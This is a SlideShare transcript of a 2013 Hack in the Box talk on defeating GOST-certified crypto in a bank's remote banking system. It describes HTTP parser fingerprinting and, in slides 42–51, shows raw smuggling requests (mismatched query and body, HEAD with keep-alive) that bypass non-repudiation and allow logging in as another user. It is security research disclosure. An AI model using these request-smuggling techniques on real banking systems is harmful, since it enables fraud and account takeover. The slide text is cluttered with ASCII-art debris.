Your SlideShare is downloading. ×
0
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps

386

Published on

Our talk from Hack in the Box Amsterdam 2013. …

Our talk from Hack in the Box Amsterdam 2013.
It’s no surprise that a typical hackers professional path hits against custom crypto protocols from time to time. There are lots of application-specific crypto-hardened protocols written from scratch which could be found in banking, SCADA, and other types of not-so-common hardware and software systems. In this presentation, we propose a methodology for breaking into such systems using a top-down approach with GOST-hardened banking applications as an example. We show how easy it is to bypass complex crypto protections because of developers having inconsistent knowledge of modern application level protocols.

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
386
On Slideshare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
4
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps Andrew Petukhov (Founder/CTO, Solidlab) George Noseevich (PhD student, MSU) Dennis Gamayunov (Acting Head, Information Systems Security Lab, MSU)
  • 2. And along comes…INTRO George Noseevich Andrew Petukhov Dennis Gamayunov 2
  • 3. Part One __________________________________________________________________/ |There was me, that is Dennis, || ||and my two droogs, that is || ||Georgie and Andrew, and we sat || ||in the lab making up our || ||rassoodocks what to do with the || ||Big Bank’s RBS, a GOST crypto || ||hardened bastard though rare. || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 3 || ||
  • 4. What we see __________________________________________________________________/|• An RBS, which uses crypto for || || – Non-repudiation || || – Authenticity || || – Protocol security || ||| • RBS comply with Russian Central | ||| Bank regulations | || ||• …unbreakable : -( ~ | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 4 || ||
  • 5. Whats it going to be then, eh?__________________________________________________________________/ | || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 5 || ||
  • 6. What comes with UltraViolence__________________________________________________________________/|• Bypass non-repudiation (force ||| RBS to process non-signed | ||| requests) | ||| • Bypass second authentication | ||| layer (enforced with crypto) | ||| • Which finally allowed to login | ||| into RBS as any valid user and | || file any request to the RBS | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 6 || ||
  • 7. And along comes…SYSTEM UNDER ASSESSMENT George Noseevich Andrew Petukhov Dennis Gamayunov 7
  • 8. Target application type (1/3)__________________________________________________________________/|• We aim at pentesting financial || || organizations, who try to: || || – Ensure transport layer security, || || non-repudiation and authentication || || – Comply with regulations || || – Protect legacy systems || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 8 || ||
  • 9. Target application type (2/3)__________________________________________________________________/ • Technical best-practices | || – Confidentiality, authenticity, non- || repudiation || • Compliance || || – Use of certified crypto || • Business needs || || – In-house vs outsource || – Solid vs modular || – Customer does not simply develop his own || | certified crypto| || – Outsourcing app development to certified | crypto writers – never a good idea / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 9 || ||
  • 10. Target application type (3/3)__________________________________________________________________/|• Solution: crypto hardened thick || || client + server side || || application specific crypto || || proxy || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 10 || ||
  • 11. Seeding the arch __________________________________________________________________/ Business logic over HTTP | || Client side Server side || || || || || || || || || || Browser RBS Application || Server || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 11 || ||
  • 12. let’s add some REQs __________________________________________________________________/ | || Req++: Transport security & Certified crypto || Client side Server side || || || || || || || || Crypto server powered by | certified crypto provider RBS Application| Browser Tunnel endpoint | Terminates tunnel Server| || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 12 || ||
  • 13. a little bit more... __________________________________________________________________/ | Req++: Authenticity & Non-repudiation || | Client side Server side| || || || || || || || Crypto server RBS Application || Browser Tunnel endpoint Server | Verifies signature| Signs ingress request If ok logs for non-repudiation Trusts custom headers || Puts everything into and passes upstream Matches id from session || custom headers with id from header | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 13 || ||
  • 14. And along comes…METHODOLOGY George Noseevich Andrew Petukhov Dennis Gamayunov 14
  • 15. Common sense suggests __________________________________________________________________/|• One doesn’t simply implement ||| application level crypto protocol | ||| • One doesn’t simply implement HTTP | || client or server from scratch || ||| • Many parsers in a row suggest | || inconsistencies => possibility for || || smuggling || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 15 || ||
  • 16. Objective __________________________________________________________________/ | ||| • Objective: | || – find differences in HTTP handling at || || crypto server side and at application || server side || ||| • Exploit: | || – use differences to bypass signature || || validation || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 16 || ||
  • 17. Basic steps for reversing arch__________________________________________________________________/ | ||• Reverse client side features || ||• Survey server side features || ||• Fingerprint integration protocol || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 17 || ||
  • 18. Dealing with client side crypto__________________________________________________________________/| • Which HTTP client and what HTTP || parser are used? || || – i.e. windows API or java HttpClient ||| • What parts of HTTP request are | || getting signed? || || – in POST? in GET? in HEAD? in TRACE? ||| • What additional metadata is | || attached to requests? || || – how signature is stored? | – how key ID is passed to the server? / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 18 || ||
  • 19. Because nothing ever changes…__________________________________________________________________/| • XML Signature Wrapping || – another kind of “You can be anything you want || to be” www.youtube.com/watch?v=RHIkb9yEV1k || || – “Analysis of Signature Wrapping Attacks and || Countermeasures“ || || • CWE-347: Improper Verification of || Cryptographic Signature and related CVE || || • Web App Cryptology: A Study in Failure || || • Now and then: Insecure random numbers || | • Now and then: Improper PKI implementation / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 19 || ||
  • 20. Fingerprinting HTTP parsers__________________________________________________________________/ |• HTTP parameter pollution || || – the same parameter in query or body || – the same parameter in query and body || ||• Duplicate headers || – control headers with metadata || || – Content-Length header || || • HTTP parameter contamination || – which characters are valid for termination || of header values? || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 20 || ||
  • 21. Fingerprinting WWW server__________________________________________________________________/ |• Which HTTP version is supported? || || – does crypto server support multiple HTTP || requests per connection? || – does it support HTTP/0.9 || ||• How does crypto server treat incorrect || || or duplicate Content-Length headers? ||• Which HTTP methods does it support? || ||• Does crypto server support multipart || || requests or chunked encoding? | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 21 || ||
  • 22. Because nothing ever changes… __________________________________________________________________/ | || • Google for <HPP bypass WAF> || || • CWE-444: Inconsistent Interpretation of || || HTTP Requests || • and all the CVE instances related to CWE- || || 444 || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 22 || ||
  • 23. Fingerprinting integration protocol__________________________________________________________________/|• How crypto server communicates ||| validation status and metadata to | || application server? || || – meta data is relayed as submitted by || || the client || – in yet unknown part of the request || || – how to get into that part? || | • HTTP Trace method/Debug interface in web| || application/Guess/Brutefroce/Read | documentation/Ask developers aka Social engineer / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 23 || ||
  • 24. And along comes…CASE STUDY George Noseevich Andrew Petukhov Dennis Gamayunov 24
  • 25. It all started as an ordinary hack__________________________________________________________________/ | || ● Test our shiny RBS web app, they || || said || || ● It comes with a certified crypto || || protection, they said || || ● Instantly found some common web app || || bugs || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 25 || ||
  • 26. …then the crypto came into play__________________________________________________________________/| ● Crypto ensures non-repudiation ||| – Your crypto-signed attack vectors | || will be used against you in court || || ● Crypto ensures authenticity || || – Session hijacking is essentially || useless || || – Cant login as other user without ||| his keys | || ● This greatly reduces severity | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 26 || ||
  • 27. Reversing the client __________________________________________________________________/ | ● Closed-source windows app || || ●| Traffic dump gives no clues | ||| ● The protocol is custom, no docs | ||| available | || || ● No time for long IDA sessions || ||| ● Seems tough  | || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 27 || ||
  • 28. Reversing the client: the lazy way__________________________________________________________________/ | ●Client uses crypto primitives || || from bundled shared libs || || ●| Library call hooks and API call | ||| traces FTW! | ||| ●Filter traces to get data that | ||| is easy to understand | || ||• API Monitor (bit.ly/37BTzf) | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 28 || ||
  • 29. API call trace __________________________________________________________________/ | || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 29 || ||
  • 30. API call trace __________________________________________________________________/ | Encrypt user data || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 30 || ||
  • 31. API call trace __________________________________________________________________/ | What is being encrypted? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 31 || ||
  • 32. API call trace __________________________________________________________________/ | What is being encrypted? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 32 || ||
  • 33. API call trace __________________________________________________________________/ | What is being encrypted? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 33 || ||
  • 34. API call trace __________________________________________________________________/ | What is being signed? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 34 || ||
  • 35. API call trace __________________________________________________________________/ | Send it through the tunnel || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 35 || ||
  • 36. API call trace __________________________________________________________________/ | Receive encrypted response || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 36 || ||
  • 37. API call trace __________________________________________________________________/ | Decrypt the response || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 37 || ||
  • 38. API call trace __________________________________________________________________/ | Send it back to browser || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 38 || ||
  • 39. so it comes like this __________________________________________________________________ / | Req++: Authenticity & Non-repudiation | | | Client side Server side | | | | |GET /login?name=value HTTP/1.1 | |Host: 10.6.28.19 | | | | | | | | Crypto server RBS Application | | Browser Tunnel endpoint Server | Verifies signature | Signs ingress request If ok logs for non-repudiation Trusts custom headers | | Puts everything into and passes upstream Matches id from session | | custom headers with id from header | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 39 || ||
  • 40. and is secured like this __________________________________________________________________/ | Req++: Authenticity & Non-repudiation || | Client side Server side| || GET /login?name=value HTTP/1.1 || Host: 10.6.28.19 || Certificate_number: 0x849 || Form_data: name=value || Signature: || 6B8A57A3EA9C25D77C01F4E957D5752C69F61D || Crypto server RBS Application | 3451E87DD18046C51DC9A9AD63C7718708159B Browser Tunnel endpoint Server| Verifies signature || 7ECF5FC8EDF4424F813DB65EF5E2D21D2F389E Signs ingress request | If ok logs for non-repudiation Trusts custom headers| 03319CA25D7003 Puts everything into and passes upstream Matches id from session || custom headers with id from header | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 40 || ||
  • 41. Further notices __________________________________________________________________/ ● Proxy signs query string for GET, | || message body for POST || ●| The server actually checks that | || Form_data reflects the query || string/body || || ● The server checks the Cert_num and || signature || || ● The web app checks that cert_num || matches the current user || || ● Kinda unbreakable, heh? | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 41 || ||
  • 42. Non-repudiation Take one __________________________________________________________________ / | Bypass Non-repudiation | | | | Client side Server side | | | |HEAD /bank/welcome?name=value HTTP/1.1 | |Host: 10.6.28.19 | | | | | | | | Crypto server RBS Application | | Browser Tunnel endpoint Server | | | | | | | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 42 || ||
  • 43. Non-repudiation Take one __________________________________________________________________/ | Bypass Non-repudiation || || Client side Server side || || HEAD /bank/welcome?name=value HTTP/1.1 || Host: 10.6.28.19 || Certificate_number: 0x849 || || || Crypto server RBS Application || Browser Tunnel endpoint Server || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 43 || ||
  • 44. Non-repudiation Take two __________________________________________________________________ / | Bypass Non-repudiation | | | | Client side Server side | | | |POST /bank/welcome?name=value1 HTTP/1.1 | |Host: 10.6.28.19 | | |Content-Length: 15 | | | |name=value2 | Crypto server RBS Application | | Browser Tunnel endpoint Server | | | | | | | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 44 || ||
  • 45. Non-repudiation Take two __________________________________________________________________/ | POST /bank/welcome?name=value1 HTTP/1.1 Bypass Non-repudiation || Host: 10.6.28.19 || Client side Server side | Content-Length: 15| Certificate_number: 0x849 || | Form_data: name=value2| || Signature: || 3195E979E107731A2572197AB9D8BC01CE2C7EE0C4 || 2B97A02393F1263C23E25D2D21E7AA7CB07114491A || 72750C2EFD1AEEAEB357C874BFB3100336F5BD01C0 Crypto server RBS Application || Browser Tunnel endpoint Server | 0C| || name=value2 || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 45 || ||
  • 46. Non-repudiation Take two – Exploit (!!!) __________________________________________________________________/ | POST /bank/welcome?name=attack-value HTTP/1.1 Bypass Non-repudiation || Host: 10.6.28.19 || Client side Server side | Content-Length: 15| Certificate_number: 0x849 || | Form_data: name=common-value| || Signature: || 3195E979E107731A2572197AB9D8BC01CE2C7EE0C42B9 || 7A02393F1263C23E25D2D21E7AA7CB07114491A72750C || 2EFD1AEEAEB357C874BFB3100336F5BD01C00C RBS Application Crypto server || Browser Tunnel endpoint Server || name=common-value || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 46 || ||
  • 47. So what? __________________________________________________________________/ | In Soviet Russia who cares about repudiation? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 47 || ||
  • 48. Authentication Log in as any other user __________________________________________________________________/ | Bypass crypto authentication || | Client side Server side| || || POST http://10.6.28.19/login HTTP/1.1 || Host: 10.6.28.19 || Content-Type: application/x-www-form- || urlencoded || Content-Length: 36 || Crypto server RBS Application | Certificate_number: 0x717 Browser Tunnel endpoint| Server || | sName=772965163660&sPass=valid.60| || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 48 || ||
  • 49. Authentication Crypto id and session id do not match __________________________________________________________________/ | Bypass crypto authentication || | Client side Server side| || || || || || || || Crypto server RBS Application || Browser Tunnel endpoint Server || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 49 || ||
  • 50. Authentication But… __________________________________________________________________/ HEAD| Bypass crypto authentication ||http://10.6.28.19/login?sName=772865163421 ||&sPass=valid.21 HTTP/1.1 Client side Server side ||Host: 10.6.28.19 ||Connection: keep-alive ||Content-Length: 10 || ||p=nonemptybody || | POST http://10.6.28.19/login HTTP/1.1 Crypto server| RBS Application ||Host: 10.6.28.19 Browser Tunnel endpoint Server ||Content-Type: application/x-www-form- ||urlencoded ||Content-Length: 36 |Certificate_number: 0x717 / ------------------------------------------------------------------ sName=772965163660&sPass=valid.60 George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 50 || ||
  • 51. Authentication But… __________________________________________________________________/ | HEAD Bypass crypto authentication || http://10.6.28.19/login?sName=772865163421&sPass=| Client side Server side| valid.21 HTTP/1.1 || Host: 10.6.28.19 || Connection: keep-alive || | Content-Length: 10| || Certificate_number: 0x849 || || p=nonemptybody Crypto server RBS Application || Browser Tunnel endpoint POST http://10.6.28.19/login HTTP/1.1 Server || Host: 10.6.28.19 || Content-Type: application/x-www-form-urlencoded || Content-Length: 36 | / Certificate_number: 0x717 ------------------------------------------------------------------ ^__^ sName=772965163660&sPass=valid.60 George Noseevich Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 51 || ||
  • 52. And along comes…WRAP UP George Noseevich Andrew Petukhov Dennis Gamayunov 52
  • 53. At first I was like…__________________________________________________________________/| • How typical pentester sees custom crypto | | protocol || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 53 || ||
  • 54. But then… __________________________________________________________________/| • It looks more intriguing || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 54 || ||
  • 55. No surprise __________________________________________________________________/| • I definitely believe that || cryptography is becoming less ||| important. In effect, even the most | || secure computer systems in the most || || isolated locations have been || penetrated over the last couple of || || years by a series of APTs and other || advanced attacks, Shamir said during || || the Cryptographers Panel session at || the RSA Conference 2013 | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 55 || ||
  • 56. Violent curiosity leads to…__________________________________________________________________/|• …successful bypass || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 56 || ||
  • 57. Contacts __________________________________________________________________/ | || || || || George @webpentest Noseevich || webpentest@bushwhackers.ru || Andrew @p3tand Petukhov || andrew.petukhov@solidlab.ru || Dennis @jamadharma Gamayunov || gamajun@seclab.cs.msu.su || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 57 || ||

×